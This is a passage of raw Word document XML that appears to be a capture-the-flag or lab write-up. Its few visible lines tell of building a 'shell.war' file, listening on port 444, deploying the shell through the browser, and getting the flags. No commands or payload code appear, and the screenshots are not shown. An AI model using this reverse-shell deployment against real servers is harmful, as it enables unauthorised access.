      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC4E1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell.war</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B9C5F79" w14:textId="233B3EB0" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197"/>
    <w:p w14:paraId="128B66EC" w14:textId="68B55C45" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r>
        <w:t>I then entered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A1AF31" w14:textId="179755F8" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r w:rsidRPr="00DC4E1F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D454478" wp14:editId="16B77885">
            <wp:extent cx="5943600" cy="713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C1CB" w14:textId="11972220" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">Now the file is ready </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E04E10A" w14:textId="07B3FEBF" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">I must go listen on port 444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65924009" w14:textId="5B8227CC" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r w:rsidRPr="00DC4E1F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="551D8776" wp14:editId="68E2AFE1">
            <wp:extent cx="2991267" cy="24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ADE1" w14:textId="000EA7BC" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r>
        <w:t xml:space="preserve">I then launch the file in the browser and deploy the shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4586A7" w14:textId="5BF69527" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r w:rsidRPr="00DC4E1F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00B2F96B" wp14:editId="55B6AC23">
            <wp:extent cx="5943600" cy="3048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DC3A" w14:textId="2ED5D99E" w:rsidR="00DC4E1F" w:rsidRDefault="00DC4E1F" w:rsidP="00302197">
      <w:r>
        <w:t>Success!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713711DE" w14:textId="704C04C1" w:rsidR="00DC4E1F" w:rsidRDefault="007C3E7B" w:rsidP="00302197">
      <w:r w:rsidRPr="007C3E7B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11C02981" wp14:editId="002D98D0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4BDD" w14:textId="5BE2EBA5" w:rsidR="007C3E7B" w:rsidRDefault="007C3E7B" w:rsidP="00302197">
      <w:r>
        <w:t>Got the flags!</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3DB46B5A" w14:textId="77777777" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197"/>
    <w:p w14:paraId="57A159E2" w14:textId="77777777" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197"/>
    <w:p w14:paraId="771F8994" w14:textId="77777777" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197"/>
    <w:p w14:paraId="1B1FD1CC" w14:textId="77777777" w:rsidR="00542DC8" w:rsidRDefault="00542DC8" w:rsidP="00302197"/>
    <w:p w14:paraId="2C5B6096" w14:textId="77777777" w:rsidR="00542DC8" w:rsidRPr="0004673D" w:rsidRDefault="00542DC8" w:rsidP="00302197"/>
    <w:sectPr w:rsidR="00542DC8" w:rsidRPr="0004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3D"/>
    <w:rsid w:val="0004673D"/>
    <w:rsid w:val="00302197"/>
    <w:rsid w:val="00542DC8"/>
    <w:rsid w:val="007C3E7B"/>
    <w:rsid w:val="008C2AD2"/>
    <w:rsid w:val="00DC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1FAE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ACA8174D-31FA-4806-BBC7-A9F94DC8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Wyrick, Kyle</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Wyrick, Kyle</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-10T20:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-10T22:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>